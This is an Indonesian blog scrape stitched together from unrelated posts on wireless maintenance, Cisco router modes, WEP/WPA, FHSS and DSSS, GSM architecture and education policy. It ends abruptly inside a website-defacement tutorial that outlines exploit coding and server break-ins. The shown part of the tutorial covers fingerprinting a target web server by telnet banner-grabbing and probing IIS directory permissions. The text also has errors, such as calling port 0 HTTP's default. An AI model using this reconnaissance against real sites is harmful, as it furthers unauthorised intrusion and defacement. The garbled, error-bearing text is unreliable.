Satu Bulan sekali, karena jika tidak ada perawatan maka Wireless akan cepat rusak dan bahkan dapat mati total

Pada bagian radio  outdor/indoor,wireless, router dan mengatur radio tersebut melalui software sesuai merk Radio / Wireless.

* User EXEC mode memperbolehkan hanya beberapa perintah monitoring terbatas. Sering disebut mode “view only”. User mode tidak memperbolehkan perintah apapun yang dapat mengganti konfigurasi router. User mode dapat diidentifikasi dengan prompt “>”.Privileged EXEC mode mampu mengakses seluruh perintah router. Mode ini dapat dikonfigurasi untuk membutuhkan password ketika user akan mencoba mengaksesnya. Global configuration mode dan mode lainnya dapat diakses setelah user mengakses mode ini.

WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access) dapat meng-enkripsi data Anda sehingga hanya penerima saja yang diharapkan dapat membaca data tersebut. WEP (Wired Equivalent Privacy) mempunyai banyak kelemahan yang membuatnya mudah disusupi. Kunci 128-bit hanya mempunyai tingkat pencapaian yang relatif rendah tanpa peningkatan keamanan yang signifikan, sedangkan untuk 40-bit atau 64-bit pada beberapa perlengkapan lainnya, mempunyai enkripsi yang sama baiknya. Dengan cara pengamanan yang standart saja pastilah tetap akan mudah bagi hacker untuk menyusup, namun dengan cara enkripsi ini pastilah akan membuat jaringan Anda lebih aman dari hacker. Jika memungkinkan, ada baiknya untuk menggunakan enkripsi WPA (peralatan yang lebih tua dapat diupgrade terlebih dahulu agar compatible dengan WPA). WPA dapat sangat menjanjikan dalam menjamin keamanan jaringan nirkabel Anda, namun masih tetap dapat dikalahkan oleh serangan DOS (denial of services).

Possibly related posts: (automatically generated)

* Penjelasan tentang komponen-komponen yang ada pada cisco router
* cara mengkonfigurasi router cisco
* KNOW – HOW ‘Untuk WLAN Dengan Area Kecil, Cukup Menggunakan WEP’
* Tips Mengamankan Jaringan Wireless

FREQUENCY HOPPING SPREAD SPECTRUM (FHSS)

Frequency Hopping Spread Spectrum merupakan teknik spread spectrum yang menggunakan teknik lompatan frekuensi yang berubah-ubah pada sinyal carrier untuk membawa suatu data informasi. Sinyal carrier atau sinyal pembawa mengubah-ubah frekuensi, atau melompat menurut urutan yang bersifat pseudorandom. Urutan pseudorandom ini digunakan sebagai suatu daftar beberapa frekuensi ke arah mana pembawa akan melompat pada suatu interval waktu yang ditetapkan sebelum terjadi pengulangan pola tersebut. Transmiter menggunakan urutan lompatan ini untuk memilih frekuensi pemancarnya. Apabila daftar frekuensi tersebut telah terpakai semua, maka transmiter atau pemancar akan mengulangi urutan tersebut.
Berikut blok diagram FHSS.

fhss-blok
Karena kompleksnya teknologi yang digunakan pada FHSS maka perlu dibuat standarisasi aturan. IEEE mengeluarkan standarisasi operasi yang meliputi beberapa kategori sistem di antaranya :
- Band Frekuensi
- Hop Sequences
- Dwell Time
- Data Rate
Keempat parameter tersebut perlu diatur dan distandardkan agar seluruh sistem yang memanfaatkan teknologi FHSS ini dapat saling kompetibel dan bisa digunakan antara yang satu dengan yang lain.

-.Band Frekuensi.-
IEEE 802.11 menetapkan standart data rates sebesar 1 Mbps dan 2 Mbps, sedangkan OpenAir (suatu standar yang diciptakan oleh forum antar operasi LAN nirkabel yang sekarang tidak berfungsi) menetapkan data rates sebesar 800 kbps dan 1.6 Mbps. Agar suatu frequency hopping systems berada pada 802.11 atau sesuai dengan OpenAir, maka ia harus beroperasi pada band frekuensi 2.4 GHz ISM (yang didefinisikan oleh FCC berada pada kisaran dari 2.4000 GHz sampai 2.5000 GHz). Kedua standar ini memungkinkan operasi pada kisaran frekuensi 2.4000 GHz sampai 2.4833 GHz, atau dengan kata lain frequency hopping band memiliki lebar lebih dari 83 MHz.

-.Hop Sequence.-
Untuk menentukan saluran yang digunakan pada FHSS menggunakan hop sequence. Frekuensi hopping bekerja menggunakan hop pattern yang disebut dengan channel. Berikut analogi dari teknik FHSS, dimana pada tiap periode waktu tertentu sinyal carrier akan mengalami perubahan frekuensi.
fhss2
Dari frekuensi di atas yang dimiliki dimungkinkan terdapat pembagian frekuensi hingga 79 sinkronisasi (2.401 GHz – 2.479 GHz dengan masing-masing kanal 1 MHz), dimana dengan system sebanyak ini setiap frekuensi hopping radio membutuhkan sinkronisasi dengan yang lain tanpa adanya interferensi. Frequency hopping system secara tipikal menggunakan 26 pola lompatan sesuai standar dari FCC. Berikut contoh sederhana untuk membantu kita memperjelas maksud hop sequence. Pada gambar di bawah ini memperlihatkan suatu frequency hopping system yang menggunakan urutan lompatan (hop sequence) sebanyak 5 frekuensi pada suatu band yang berukuran 5 MHz. Dalam contoh ini urutannya adalah:
1. 2.449 GHz 4. 2.450 Ghz
2. 2.452 GHz 5. 2.451 Ghz
3. 2.448 GHz
Sedangkan visualisasinya sebagai berikut.

fhss

Setelah radio memancarkan informasi pada pembawa 2.451 GHz, radio tersebut akan mengulang hop sequence (urutan lompatan), kemudian dimulai lagi dari frekuensi 2.449 GHz.

-.Dwell Time.-
Dalam FHSS kita tahu bahwa frekuensi dari carrier akan berpindah-pindah atau melompat-lompat dari frekuensi yang satu ke frekuensi yang lain. Penempatan carrier pada suatu frekuensi memiliki waktu tertentu. Waktu inilah yang dinamakan dwell time. Atau dengan kata lain, dwell time merupakan rentang lamanya waktu yang diperlukan oleh sistem untuk menempati suatu kanal tertentu, sehingga carrier masih akan berada pada suatu frekuensi tertentu selama jangka waktu yang ditetapkan. Ketika dwell time habis, sistem akan berganti ke frekuensi yang berbeda dan memulai untuk mengirim lagi.

-.Hop Time.-
Pada saat suatu frequency hopping radio melompat dari frekuensi A ke frekuensi B maka ia harus mengubah frekuensi pancar dalam salah satu dari dua cara yaitu, radio tersebut harus beralih ke suatu rangkaian yang berbeda yang telah diselaraskan dengan frekuensi baru tersebut, atau ia harus mengubah sebagian elemen dari rangkaian yang ada untuk menyelaraskan dengan frekuensi baru tersebut. Pada tiap cara, proses peralihan ke frekuensi baru harus tuntas sebelum transmisi dapat dijalankan kembali, dan perubahan ini membutuhkan waktu karena adanya latensi listrik yang inheren dalam sistem rangkaian. Terdapat sedikit waktu selama perubahan frekuensi ini dimana radio tersebut tidak memancar, yang disebut hop time. Hop time diukur dalam mikrodetik (μs) dan dengan dwell time yang relatif panjang yaitu sekitar 100-200 ms, hop time menjadi tidak signifikan. Sistem FHSS 802.11 yang tipikal melompat antar saluran dalam waktu 200-300 μs.

hop-dan-dwell-time-2

DIRECT SEQUENCE SPREAD SPECTRUM (DSSS)

DSSS merupakan suatu metode untuk mengirimkan data dimana sistem pengirim dan penerima keduanya berada pada set frekuensi yang lebarnya adalah 22 MHz. Saluran yang lebar ini memungkinkan piranti untuk memancarkan lebih banyak informasi pada data rate yang lebih tinggi dibanding FHSS system yang ada sekarang.

Teknik spreading yang terkenal dan banyak dipilih para produsen dalam desain produk adalah Direct Sequence Spread Spektrum (DSSS). Sistem ini dipilih karena adanya kemudahan dalam mengacak data yang akan dispreading. Disamping itu, DSSS juga mempunyai unjuk kerja terbaik untuk gangguan noise dan anti jamming, serta paling susah untuk dideteksi. Dalam DSSS spreading hanya menggunakan sebuah generator noise yang periodik yang di sebut Pseudo Noise Generator. Namun ada kekurangan pada DSSS ini yang sering menjadi kendala dalam implementasinya, yaitu pada proses sinkronisasi sinyal yang diterima dengan sinyal dari generator noise lokal pada penerima.

DSSS menggabungkan sinyal data pada stasiun pengirim dengan suatu data rate bit sequence yang lebih tinggi, yang dikenal sebagai chipping code atau processing gain. Processing gain yang tinggi meningkatkan tahanan sinyal terhadap interferensi. Adapun standar processing gain dari FCC adalah minimum 10, seddangkan 802.11 IEEE menetapkan minimum 11.
Berikut blok diagram dari DSSS.

dsss-blok

Proses direct sequence memodulasi carrier dengan suatu code sequence. Jumlah “chips” dalam code tersebut akan menentukan seberapa besar penyebaran (spreading) yang terjadi, dan jumlah chip per bit dan laju code (dalam chip per detik) akan menentukan data rate. Adapun yang perlu diatur di dalam teknologi DSSS adalah band frekuensi dan pengaturan saluran.

-.Band Frekuensi.-
Pada 2.4 GHz ISM band, IEEE menetapkan penggunaan DSSS pada data rate 1 atau 2 Mbps menurut standar 802.11. Sedangkan untuk standar 802.11b (high-rate wireless) menetapkan data rate sebesar 5.5 dan 11 Mbps. Piranti IEEE 802.11b yang bekerja pada 5.5 atau 11 Mbps mampu berkomunikasi dengan piranti-piranti 802.11 yang bekerja pada 1 atau 2 Mbps karena standar 802.11b menyediakan backward compatibility. Atau dengan kata lain, user yang menggunakan piranti-piranti 802.11 tidak perlu mengupgrade keseluruhan piranti LAN nirkabel mereka untuk dapat menggunakan piranti-piranti 802.11b pada jaringan mereka. Sedangkan teknologi 802.11g menjadi teknologi 54 Mbps pertama yang memiliki backward compatibility dengan piranti 802.11 dan 802.11b. Teknologi 802.11g merupakan sistem direct sequence yang bekerja pada 2.4 GHz ISM band yang dapat mengirimkan data hingga mencapai data rate sebesar 54 Mbps.

-.Co-Channel.-
Berbeda dengan frequency hopping system yang menggunakan hop sequences untuk mendefinisikan saluran, direct sequence system menggunakan suatu definisi saluran yang lebih konvensional. Tiap saluran merupakan suatu band frekuensi yang bersebelahan yang lebarnya 22 MHz. Saluran 1, misalnya, bekerja dari frekuensi 2,401 GHz sampai 2,432 GHz (2,412 GHz ± 11 MHz); saluran 2 bekerja dari 2,406 sampai 2,429 GHz (2.417 ± 11 MHz), dan seterusnya. Berikut visualisasinya.
dsss

Kita dapat melihat bahwa saluran 1 dan 2 bertumpang tindih (overlap) dengan suatu besaran yang signifikan. Pemakaian sistem DSSS dengan saluran-saluran yang bertumpang-tindih (overlapping channel) akan menimbulkan interferensi antar-sistem tersebut. Jika kita melihat gambar di atas maka terdapat jarak 5 Mhz dari masing-masing frekuensi sentral (mis. saluran 1 f-sentral = 2,412 GHz sedangkan saluran 2 f-sentral = 2,417 dan seterusnya). Maka dengan demikian saluran-saluran hanya boleh ditempatkan pada lokasi yang sama dan yang terpisah satu sama lain yaitu saluran 1, 6 dan 11 tidak bertumpang-tindih; saluran 2 dan 7 tidak bertumpang-tindih, dan seterusnya.
dsss2
PERBANDINGAN FHSS DAN DSSS

Teknik spread spectrum antara FHSS dan DSSS memiliki perbedaan cara dan metode, oleh karenanya pada kedua teknik tersebut memiliki keunggulan dan kelemahan tersendiri antara yang satu dengan yang lain. Dari kesimpulan pemaparan di atas maka ada beberapa poin yang dapat kita bandingkan, di antaranya :
• Interferensi narrowband
• Biaya
• Co-lokasi
• Kompatibilitas dan ketersediaan peralatan

-.Interferensi Narrowband.-
Keunggulan dari teknologi FHSS meliputi resistensinya yang lebih besar terhadap interferensi narrowband. Sistem DSSS mungkin lebih dipengaruhi oleh interferensi narrowband jika dibanding sistem FHSS karena sistem tersebut menggunakan band-band yang berdekatan dengan lebarnya 22 MHz, bukannya 79 MHz seperti yang digunakan pada sistem FHSS.

-.Biaya.-
Biaya untuk mengimplementasikan suatu direct sequence system jauh lebih rendah jika dibanding dengan biaya frequency hopping system. Karena pada direct sequence untuk tiap peralatan memiliki kanal frekuensi tersendiri sehingga komponen yang diperlukan satu peralatan lebih sederhana.

-.Co-lokasi.-
Keunggulan dari FHSS jika dibanding DSSS adalah kemampuannya untuk menepatkan lebih banyak frequency hopping system secara bersamaan jika dibanding pada direct sequence system. Karena frequency hopping system merupakan frekuensi yang memiliki agilitas tinggi dan memanfaatkan 79 saluran diskrit, maka frequency hopping system memiliki suatu keunggulan ko-lokasi, dibanding direct sequence system, yang memiliki co-lokasi maksimum 3 titik akses (pada satu area bisa digunakan maksimum 3 kanal frekuensi). Akan tetapi jika kita membandingkan throughput dari keduanya maka DSSS masih lebih unggul daripada FHSS, karena DSSS memiliki maksimum 3 titik akses.

-.Kompatibilitas dan ketersediaan peralatan.-
WECA (Wireless Ethernet Compatibility Alliance) melakukan pengujian atas peralatan LAN nirkabel DSSS yang sesuai dengan standar 802.11b untuk menjamin bahwa peralatan semacam itu dapat bekerja pada kondisi adanya dan beroperasi bersama dengan piranti DSSS standar 802.11 lainnya. Standar interoperasibilitas yang diciptakan oleh WECA yang sekarang pemakaiannya disebut sebagai Wireless Fidelity, atau Wi-Fi. Sedangkan untuk FHSS belum ada organisasi yang mau melangkah lebih jauh untuk melakukan semacam pengujian kompatibilitas seperti pada DSSS.

Semoga dengan sedikit catatan penjelasan tentang teknologi spread spectrum di atas, dapat memberikan gambaran kepada kita semua dan semakin mencerdaskan kita tentang teknologi-teknologi seluler saat ini, terutama teknologi spread spectrum pada CDMA. Demi perbaikan yang ada mengenai tulisan di atas maka alangkah baiknya jika di dalam forum ini diharapkan akan terjadi banyak diskusi yang dapat kita bahas bersama. OK?
Bangsa yang cerdas ada karena masyarakat yang cerdas pula.

Referensi : Jurnal DASI (Perbandingan FHSS dan DSSS); DenayerInstitute-handbook.

Posted in Telekomunikasi | 1 Comment »
Global System for Mobile Communication (GSM)
November 26th, 2008

PERKEMBANGAN TEKNOLOGI GSM

Global System for Mobile Communication (GSM) merupakan standar yang diterima secara global untuk komunikasi selular digital. GSM adalah nama group standardisasi yang dimapankan pada tahun 1982 untuk menghasilkan standar telepon bergerak di Eropa. Perkembangan GSM ini dilatarbelakangi oleh keadaan di tiap-tiap negara Eropa pada ssat itu yang masih menggunakan system telekomunikasi wireless yang analog dan tidak compatible antara negara, sehingga tidak memungkinkan dilakukannya roaming antar negara. Standar sistem komunikasi ini dikembangkan oleh European Telecommunication Standard Institute (ETSI) pada tahun 1988 dan diperkirakan banyak negara lainnya diluar eropa akan turut menggunakan teknologi GSM.

Perkembangan Teknologi Selular

Global System for Mobile Communication (GSM) adalah generasi kedua dari standar sistem selular yang dikembangkan untuk menyelesaikan masalah fragmentasi dari sistem selular generasi pertama. Perbedaan utama sistem 2G dengan teknologi sebelumnya (1G) terletak pada teknologi digital yang digunakan. Keuntungan teknologi generasi kedua dibanding dengan teknologi generasi pertama antara lain sebagai berikut :

Kapasitas sistem lebih besar, karena dominan menggunakan teknologi TDMA (digital), dimana penggunaan sebuah kanal dibagi ke dalam beberapa domain waktu. Hal ini berlawanan dengan teknologi generasi pertama yang hanya menggunakan FDMA.
Adanya standard internasional yang digunakan sebagai rujukan perkembangan teknologi selular sehingga sistem pada negara – negara yang berbeda tersebut masih tetap kompatible satu dengan lainnya sehingga dimungkinkannya roaming antara negara.
Service yang beragam. Dengan menggunakan teknologi digital, sehingga service yang ditawarkan menjadi lebih beragam dan juga memungkinkan diimplementasikannya service-service yang berbasis data, seperti SMS dan juga pengiriman data dengan kecepatan rendah.
Tingkat sekuriti yang lebih baik karena menggunakan teknologi digital, dimana dimungkinkan utk melakukan encripsi dan chipering informasi.

Evolusi Teknologi Generasi
Evolusi Teknologi Generasi

ARSITEKTUR GSM

Pada arsitektur GSM kita mengenal tiga subsystem utama yang memiliki tugas dan peran sendiri-sendiri di antaranya :
1. Base Station Subsystem (BSS), memiliki fungsi utama sebagai pengirim dan penerima sinyal radio dari dan menuju Mobile Station (MS).
2. Network and Switching Subsystem (NSS), berperan dalam melakukan pengawan dan control switch pada BSS.
3. Operation and Maintenance Center (OMC), merupakan bagian yang berfungsi untuk mengoperasikan dan menyediakan Operating System (OS) bagi keduanya (BSS dan NSS).

Arsitektur GSM
Arsitektur GSM

Satu lagi sub system yang ada di dalam GSM yaitu Mobile Station (MS). Mobile Station (MS) merupakan alat komunikasi yang dibutuhkan pelanggan untuk dapat mengakses layanan yang telah disediakan oleh operator GSM. MS dapat berupa alat komunikasi yang terpasang pada kendaraan atau yang mudah dibawa (portable handheld). MS terdiri atas Mobile Equipment (ME) dan Subscriber Identification Module (SIM) card. SIM card merupakan kartu identitas bagi pelanggan. Tanpa adanya SIM, maka mobile equipment tidak dapat beroperasi. Dalam SIM card terdapat microprosesor dan memori untuk menyimpan data pelanggan. MS biasanya dianggap sebagai bagian dari BSS.

Base Station Subsystem (BSS)
Base Station Subsystem (BSS), atau yang biasa dikenal sebagai radio subsystem adalah penyedia dan pengatur transmisi radio dari system selular. Fungsi utama dari BSS adalah menghubungkan antara MS dengan NSS. Interface antara MS dengan subsistem lain dari GSM juga diatur melalui BSS. BSS terdiri dari 3 bagian utama, yaitu:
Base Transmission Station (BTS).-
BTS berfungsi untuk mengkoneksikan Mobile Station dengan Base Station Controller (BSC). Sebuah BTS terdiri dari pemancar dan penerima radio serta antena. Penjelasan mengenai BTS lebih dalam akan dijelaskan pada subbab tersendiri di bawah.
Base Station Controller (BSC).-
BSC mengatur semua fungsi hubungan radio dari jaringan GSM. BSC adalah switch berkapasitas besar yang menyediakan fungsi seperti handover HP, penyediaan chanel radio, dan kumpulan dari konfigurasi data beberapa cell. Beberapa BSC dapat dikontrol oleh setiap MSC.
Transcoder and Adapter Unit (TRAU).-
Transcoder and Rate Adapter Unti (TRAU) merupakan bagian dari Base Station Subsystem. TRAU terletak antara BSC dan MSC dimana untuk berkomunikasi menggunakan A interface. TRAU berfungsi untuk melakukan transcoding (de-/compressing) sinyal suara dan data rate adaptation (mengadaptasi kecepatan data yang diakses).

Network Switching Subsystem (NSS)
Network Switch Subsystem (NSS) berperan dalam mengkoneksikan antar user dalam sebuah jaringan atau ke jaringan yang lain. NSS terdiri dari lima komponen jaringan di antaranya :
Mobile Switching Center (MSC).-
MSC merupakan inti dari network subsystem, yang berperan untuk interkoneksi hubungan antar BSS, antar MSC atau dengan jaringan telepon kabel PSTN, ataupun dengan jaringan data.
Home Location Register (HLR).-
HLR berfungsi untuk penyimpan semua data dan informasi mengenai pelanggan yang tersimpan secara permanen, tidak tergantung pada posisi pelanggan. HLR bertindak sebgai pusat informasi pelanggan yang setiap waktu akan diperlukan oleh VLR untuk merealisasi terjadinya komunikasi pembicaraan. VLR selalu berhubungan dengan HLR dan memberikan informasi posisi pelanggan berada.
Visitor Location Register (VLR).-
VLR berfungsi untuk menyimpan data dan informasi pelanggan. Adanya informasi mengenai pelanggan dalam VLR memungkinkan MSC untuk melakukan hubungan Incoming (panggilan masuk) maupun Outgoing (panggilan keluar). VLR bertindak sebagai database pelanggan yang bersifat dinamis karena selalu berubah setiap waktu, menyesuaikan dengan pelanggan yang memasuki atau berpindah naungan MSC.
Authentication Center (AuC).-
AuC menyimpan semua informasi yang diperlukan untuk memeriksa keabsahan pelanggan, sehingga usaha untuk mencoba mengadakan hubungan pembicaraan bagi pelanggan yang tidak sah dapat dihindarkan. Di samping itu, AuC berfungsi untuk menghindarkan adanya pihak ketiga yang secara tidak sah mencoba untuk menyadap pembicaraan.

Operation Subsystem (OSS)
OSS digunakan untuk melakukan remote monitoring dan manajemen jaringan. Pada OSS terdapat Operation and Monitoring Center (OMC) yang berfungsi melakukan monitoring unjuk kerja jaringan dan melakukan konfigurasi remote dan pengaturan aktivitas kesalahan seperti alarm dan monitoring. Adapun OMC dibagi menjadi dua yaitu OMC-R yang merupakan OMC bagi BSS dan OMC-S yang merupakan OMC bagi NSS.

Posted in Telekomunikasi | No Comments »
Serba Instant Pemerintah dalam Dunia Pendidikan
November 26th, 2008

Negara merupakan sesuatu yang tidak bernyawa, akan tetapi suatu negara akan tampak bernyawa ketika individu-individu yang bertempat di dalamnya dapat memberikan warna kehidupan. Hitam putihnya sebuah negara tergantung pada warna apa yang ditorehkan masyarakat di dalamnya. Itulah mengapa, ada suatu negara yang dikatakan maju, berkembang, bahkan tertinggal sekalipun. Ada banyak faktor mengapa negara disebut demikian. Adapun ukuran maju mundurnya suatu negara salah satunya dapat dilihat dari keberhasilan negara dalam mengembangkan bidang pendidikannya. Hal ini dikarenakan suatu bangsa akan hidup apabila memiliki generasi penerus dengan kemampuan sumber daya manusia yang berkualitas dalam menyukseskan pembangunan berkelanjutan yang akan menyejahterahkan masyarakat itu sendiri. Sumber daya manusia yang berkualitas adalah mereka yang mampu menguasai suatu bidang keahlian dalam ilmu pengetahuan dan teknologi, mampu melaksanakan pekerjaan secara profesional, serta mampu menghasilkan karya-karya unggul yang dapat bersaing di dunia. Sedangkan salah satu keberhasilan mencetak generasi penerus yang berkompeten tersebut melalui peranan bidang pendidikan.

Berkualitasnya nilai pendidikan suatu negara tidak hanya ditentukan oleh satu faktor saja, melainkan dari berbagai macam faktor di antaranya kualitas para pendidik, sarana dan prasarana yang dimiliki, sistem pendidikan yang baik, dukungan pemerintah yang luas dan banyak faktor lainnya.
Saat ini Indonesia merupakan salah satu negeri yang telah didera oleh berbagai keterpurukan, yang diantara penyebab keterpurukan tersebut terjadi karena kekeliruan dalam menyelenggarakan sistem pendidikan nasionalnya. Dalam UU No.20/2003 tentang Sistem Pendidikan Nasional (Sisdiknas) Pasal 3 disebutkan bahwa pendidikan nasional berfungsi mengembangkan kemampuan dan membentuk watak serta peradaban bangsa yang bermartabat dalam rangka mencerdaskan kehidupan bangsa, bertujuan untuk berkembangnya potensi peserta didik agar menjadi manusia yang beriman dan bertakwa kepada Tuhan Yang Maha Esa, berakhlak mulia, sehat, berilmu, cakap, kreatif, mandiri, dan menjadi warga negara yang demokratis serta bertanggung jawab. Berdasarkan definisi ini maka terdapat beberapa kecakapan hidup yang diharapkan dapat dimiliki oleh peserta didik setelah menempuh suatu proses pendidikan.

Berawal dari perubahan sistem atau kurikulum pendidikan yang selalu berganti-ganti dalam waktu yang relatif singkat mulai dari CBSA, KBK, hingga KTSP. Hal ini mengindikasikan seakan-akan menunjukkan bahwa adanya ketidakkonsistenan pemerintah dalam mengurusi masalah pendidikan di Indonesia. Hal ini menimbulkan pandangan negatif masyarakat terhadap pemerintah yang tidak serius dalam menangani sistem yang mereka buat sendiri tanpa ada kajian yang jelas dan matang terlebih dahulu untuk mencari format sistem pendidikan yang sesuai dengan negara kita. Tidak hanya kurikulum pendidikan, bahkan sistem pendidikan melalui Ujian Nasional (UNAS) pun ikut mengalami perubahan. Ujian nasional sejatinya bukanlah suatu hal yang baru bagi dunia pendidikan kita. Hal inilah yang kemudian menyulut berbagai permasalahan yang membuat masyarakat semakin tidak percaya dan yakin terhadap kebijakan-kebijakan yang telah dikeluarkan. Mengutip pernyataan Kepala Sekolah Yayasan Kepanjen 1 menegaskan, penyebab banyaknya siswa gagal UNAS karena pemerintah sendiri, ketika kebijakan UNAS diubah dalam tiga tahun terakhir.

Ada banyak sekali pendapat-pendapat yang muncul di masyarakat yang menginginkan UNAS untuk tidak diadakan dan ada pula yang menginginkan untuk tetap diadakan. Dalam rangka pelaksanaan ujian nasional tahun pelajaran 2007/2008, Departemen Pendidikan Nasional mengadakan beberapa perubahan terhadap ujian nasional sebelumnya. Ujian Nasional dilaksanakan untuk menilai pencapaian kompetensi lulusan secara nasional pada mata pelajaran tertentu dalam kelompok matapelajaran ilmu dan pengetahuan teknologi.

Kesalahan sistem pendidikan Indonesia ialah terlalu memaksa anak untuk dapat menguasai sekian banyak bidang studi dengan materi yang sedemikian abstrak, selanjutnya membuat anak merasa tertekan yang dampaknya membuat mereka suka bolos, bosan sekolah, tawuran, mencontek, dan lain-lain. Kemudian pada akhirnya mereka tidak dapat mengerjakan ujian dengan baik, sehingga nilai mereka kurang padahal sudah dilakukan remidi. Untuk mengatasi hal ini, supaya dianggap bisa mengajar atau karena tidak boleh ada nilai kurang atau karena kasihan beban pelajaran siswa terlalu banyak, kemudian guru melakukan manipulasi nilai raport. Nilai raport inilah yang kemudian dijadikan dasar untuk memperoleh beasiswa atau melanjutkan kuliah atau ikut PMDK dan lain sebagainya. Bukan, karena UNAS tidak adil, bahwa kemampuan siswa tidak dapat distandardisasi. Kompetensi manusia tidak bisa distandardisasi dan di rangking, semua memiliki kelebihan dan kekurangan, kalaupun mau dipaksakan ada standardisasi, sistem pendidikan Indonesia diperbaiki terlebih dahulu. Oleh karena itu, meskipun menaikkan kuantitas mata pelajaran yang diujikan pada UNAS hal itu tetap tidak dapat meningkatkan kualitas pendidikan di negeri kita.

Dalam paradigma materialistikpun indikator keberhasilan belajar siswa setelah menempuh proses pendidikan dari suatu jenjang pendidikan saat ini adalah dengan perlakuan yang sama secara nasional pemerintah mengukurnya berdasarkan perolehan angka Ujian Nasional (UNAS) yang dahulu disebut sebagai Evaluasi Belajar Tahap Akhir Nasional (EBTANAS), indikator itupun hanya pada beberapa mata pelajaran saja yang kesemuanya tersebut berbasis pada aspek kognitif (pengetahuan). Pemerintah (Mendiknas) menilai bahwa UNAS sangat tepat untuk dijadikan sebagai alat ukur standar pendidikan, dan hasil UNAS sangat riil untuk dijadikan alat meningkatkan mutu pendidikan
Hal ini mengindikasikan bahwa pemerintah selama ini berusaha meningkatkan kualitas pendidikan dengan cara memaksakan, karena kebijakan-kebijakan ini tidak diimbangi dengan pengelolaan faktor-faktor intrinsik lainnya seperti peningkatan kualitas pendidik, sarana dan prasarana, dan sebagainya. Padahal dengan pengembangan dan peningkatan kualitas faktor-faktor intrinsik tersebut kita dapat mengembangkan pendidikan di negara kita lebih maju daripada harus instant memaksakan siswa lulus dengan standar kelulusan tertentu.

Tidak hanya perubahan kurikulum dan sistem UNAS, bahkan dana Bantuan Operasional Sekolah (BOS) berupa sekolah gratis di sekolah-sekolah lain disinyalir banyak menimbulkan permasalahan baru misal kecurangan-kecurangan dan harapan yang tidak sesuai. Harapan yang tidak sesuai itu timbul melalui pertanyaan apakah mutu pendidikan menjadi lebih meningkat hanya dengan membebaskan biaya pendidikan formal. Karena segala sesuatu hal yang gratis akan membuat kita terbuai dan selalu bergantung pada bantuan. Secara sederhana dapat dikatakan bahwa setidaknya upaya tersebut ditempuh hanya untuk mencegah bertambahnya para anak muda yang drop out, putus sekolah dan tidak dapat melanjutkan sekolah karena terhimpit biaya.

Artikel ini dibagi menjadi beberapa bagian pokok, yaitu:

- Software pendeteksi web server
- Analisa konfigurasi web server
- Pemeriksaan celah keamanan
- Coding exploit
- Mengeksploitasi celah keamanan untuk membobol server
- Injeksi malicious code melalui URL
- Mengamankan diri anda sendiri
- Kesimpulan

DETEKSI IDENTITAS WEB SERVER

Mendeface website bukanlah keseluruhan aktifitas hacking. Tidak diperlukan otak seorang hacker, atau hacker yang jenius. Yang diperlukan hanyalah mencari exploit, sejumlah keterampilan pemrograman yang memadai dan waktu luang untuk trial and error. Pada dasarkanya setiap software memiliki beberapa celah keamanan (kesalahan pemrograman) mengeksploitasi yang memungkinkan seseroang mendapatkan akses root (administrator privilege) ke sistem yang menjalankan software tertentu. Dengan menggunakan konsep ini website itu terdeface. Anda dapat menemukan banyak celah keamanan yang terkini melalui website seperti:

http://www.securityfocus.com , http://www.packetstormsecurity.com , http://www.securiteam.com dsb. beberapa situs bahkan memberikan code exploitnya. Namun sebelum anda mencari exploit atau celah keamanan pada situs tersebut, anda perlu mengetahui software server yang dijalankan oleh website sasaran. Setelah mengetahui software server tersebut, selanjutnya anda harus mencari celah keamanan dan exploit yang cocok pada software tersebut.

Pendeteksi webserver sangat mudah digunakan dan metodenya jelas. Pada dasarnya apa yang terjadi saat suatu request dikirimkan ke webserver yang terpaksa membuat pesan error 400, atau 200 OK message, 404 forbidden error message pada raw mode (melalui telnet) kemudian software server tersebut merespon dengan pesan yang sesuai yang berisikan software webserver berikut info versi. Jadi apa yang kita perlu lakukan hanyalah telnet terhadap port 80 (port default untuk web server) dari web server dan mengirimkan beberapa request ke server tersebut yang merespon dengan 400 bad request error message atau 200 OK message yang berisikan informasi versi dan software server tersebut.

Microsoft Telnet>telnet 127.0.0.1 80
GET \ HTTP/1.1\r\n\r\n
Host:server-software

HTTP/1.1 403 Forbidden
Date: Sat, 10 Aug 2002 16:55:41 GMT
Server: Apache/1.3.22 (Win32)
Connection: close
Content-Type: text/html; charset=iso-8859-1

403 Forbidd
en

Forbidden

You don’t have permission to access /
on
this server.

Apache/1.3.22 Server at www.apache.org Port 80

Connection to host lost.

OK, saya harap anda mendapatkannya. Sederhana saja. Ringkasnya apa yang anda perlu lakukan hanyalah melakukan telnet ke port 80 dari webste target anda (anda bahkan bisa melakukan telnet ke nama domain tersebut, misalnya telnet hackersclub.up.to 80) ketik pada beberapa request seperti GET \ HTTP/1.1\r\n\r\n kemudian ketik sesuatu seperti host: server-software kemudian tekan cuman beberapa saat hingga anda mendapatkan respon server tersebut. Server tersebut akan merespon dengan informasi software tersebut.

ANALISA WEB SERVER

Pada dasarnya default instalasi IIS (Internet Information Service) berisikan website root pada c:\Inetpub\wwwroot. Dimana seluruh direktori tersebut ada dalam direktori c:\inetpub (dalam kasus IIS dan c:\apache group\apache\htdocs untuk versi win32 dari Apache). Seluruh folder didalamnya dianggap sebagai Direktori Virtual. Dalam suatu webserver masing-masing direktori virtual tersedia dengan jenis permisi yang berbeda. Permisi seperti Read, Write, Execurtion of Scripts, Execution of Executable seperti .dll dan halaman server side seperti ASP, cgi dsb., Directory Browsing.

Disini saya akan menggambarkan metode analisa direktori permisi dari direktori virtual yang terletak dalam suatu web server.

Read Access: Kapanpun anda mengunjungi suatu website dengan menulis nama domain website pada web browser anda, maka yang sebenarnya terjadi adalah bahwa anda terhubung ke port 0 (default port HTTP) dari IP address yang terasosiasi dengan nama domain. Katakanlah IP address dari Yahoo.com adalah 203.197.102.78. Jadi saat anda mengeti http://www.yahoo.com pada address bar web browser anda maka yang terjadi adalah URL (Uniform Resource Locator) dinyatakan ke http://203.197.102.78:80/index.html (atau index.htm, index.asp, default.asp, index.jsp, default.jsp, index.php, default.php atau apapun yang terkonfigurasi sebagai halaman index pada webserver tersebut). Sekarang ketik URL tersebut, maka anda akan memperoleh webiste yahoo dimana anda dapat membaca isinya dari wwwroot. Jika berisikan file executable seperti ASP, JSP atau PHP, maka halaman server side dieksekusi dan membuat halaman HTML pada web browser (client) oleh IIS (server) atau webserver dinamis lainnya. Sekarang saat anda membaca suatu dokumen dari suatudirektori yang diberikan meka hal ini menunjukkan bahwa direktori tersbut dapat dibaca. Pada dasarnya direktori berisikan file database yang dilindungi dengan read access demi keamanan.

